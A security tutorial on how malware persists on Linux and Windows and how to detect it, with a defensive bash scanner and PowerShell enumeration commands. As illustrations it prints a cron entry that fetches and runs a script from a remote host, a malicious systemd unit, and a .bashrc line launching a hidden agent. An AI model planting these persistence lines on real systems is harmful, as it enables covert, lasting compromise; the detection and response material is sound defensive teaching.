Intermediate System & Host

Malware Persistence — cron, registry, services, and startup

Persistence is malware's ability to survive system reboots. After compromising a machine, the attacker installs a mechanism that re-executes the payload automatically, without any further interaction. Knowing these entry points is essential for incident response.

Linux — common mechanisms

Malicious cron jobs

# Cron locations an attacker may modify
crontab -l                  # current user's cron
cat /etc/crontab            # system-wide cron
ls /etc/cron.d/             # cron fragments
ls /var/spool/cron/crontabs # per-user crons

# Example malicious entry:
*/5 * * * * root curl -s http://192.168.1.100/payload.sh | bash

Detection: compare crontabs against a known-good baseline; monitor writes to /var/spool/cron and /etc/cron.d with auditd.

Persistent systemd units

# Malicious service installed
cat /etc/systemd/system/updater.service

[Unit]
Description=System Updater

[Service]
ExecStart=/tmp/.hidden/agent
Restart=always

[Install]
WantedBy=multi-user.target

Find recently created units:

find /etc/systemd/system/ -newer /etc/passwd -name "*.service"
systemctl list-units --type=service --state=running

~/.bashrc and ~/.profile

# Line appended to .bashrc
echo "nohup /tmp/.cache/agent &>/dev/null &" >> ~/.bashrc

Review shell initialization files regularly.
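As an added example (not from the original page), the script below applies the Linux checks above to files: it flags crontab or shell-init lines that pipe curl/wget into a shell or launch something from /tmp, /dev/shm or a hidden dot-directory, and systemd units whose ExecStart points at such a path. The patterns, function names and the sample crontab are constructed heuristics; hits are leads to compare against a baseline, not proof of compromise.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): apply the Linux checks above to
# files. Flags lines that pipe curl/wget into a shell or run something from
# /tmp, /dev/shm or a hidden dot-directory, and systemd units whose ExecStart
# points there. Patterns and sample data are constructed heuristics; treat hits
# as leads to compare against a baseline, not as proof of compromise.

SUSPICIOUS_PATH='(/tmp/|/dev/shm/|/[.][A-Za-z0-9_-]+/)'

# Return 0 (suspicious) for a crontab or shell-init line that matches either
# pattern; 1 for anything else. Comments and blank lines are never flagged.
is_suspicious_cmd() {
  case "$1" in
    '#'*|'') return 1 ;;
  esac
  printf '%s\n' "$1" | grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' && return 0
  printf '%s\n' "$1" | grep -Eq "$SUSPICIOUS_PATH" && return 0
  return 1
}

# Return 0 if a systemd unit, passed as text, starts a binary from a suspicious path.
is_suspicious_unit() {
  printf '%s\n' "$1" | grep -Eq "^ExecStart=.*$SUSPICIOUS_PATH"
}

# Scan a crontab-format or .bashrc-style file line by line: report hits on
# stderr and print the number of hits on stdout.
scan_file() {
  local file=$1 line count=0
  while IFS= read -r line; do
    if is_suspicious_cmd "$line"; then
      printf 'SUSPICIOUS %s: %s\n' "$file" "$line" >&2
      count=$((count + 1))
    fi
  done < "$file"
  echo "$count"
}

# Constructed sample crontab; the curl line mirrors the page's example entry.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
# m h dom mon dow user command
0 2 * * * root /usr/bin/apt-get update
*/5 * * * * root curl -s http://192.168.1.100/payload.sh | bash
@reboot www-data /dev/shm/.x/agent
EOF
echo "suspicious entries in sample crontab: $(scan_file "$SAMPLE")"
rm -f "$SAMPLE"
```

Run the same functions over /etc/crontab, the files in /etc/cron.d and each user's ~/.bashrc, and feed is_suspicious_unit the contents of units under /etc/systemd/system.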

Windows — common mechanisms

Registry Run Keys

The most commonly abused autorun keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

# List autorun entries
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"

Scheduled Tasks

# List all tasks
Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } |
  Select-Object TaskName, TaskPath, State

# Inspect a suspicious task
Export-ScheduledTask -TaskName "WindowsUpdate" | Out-String

Windows Services

# Services with binary in an unusual location
Get-WmiObject Win32_Service |
  Where-Object { $_.PathName -notlike "*System32*" -and $_.PathName -notlike "*Program Files*" } |
  Select-Object Name, PathName, StartMode

Startup folder

User:   C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
System: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\

# List the current user's startup folder
Get-ChildItem "C:\Users\$env:USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

Detection tools

Linux:
  - chkrootkit / rkhunter — detect rootkits and modifications
  - auditd — monitor writes to sensitive locations
  - ls -la /tmp /dev/shm — malware's favorite directories

Windows:
  - Autoruns (Sysinternals) — shows ALL persistence points
  - Sysmon Event ID 13 — registry key write
  - Event ID 7045 — new service created

Incident response

  1. Isolate the machine from the network
  2. Take a snapshot / disk image
  3. Identify and document the persistence mechanism
  4. Remove the payload and the mechanism
  5. Analyze the original entry vector — otherwise the attacker comes back

Never just remove the malware without understanding how it got in.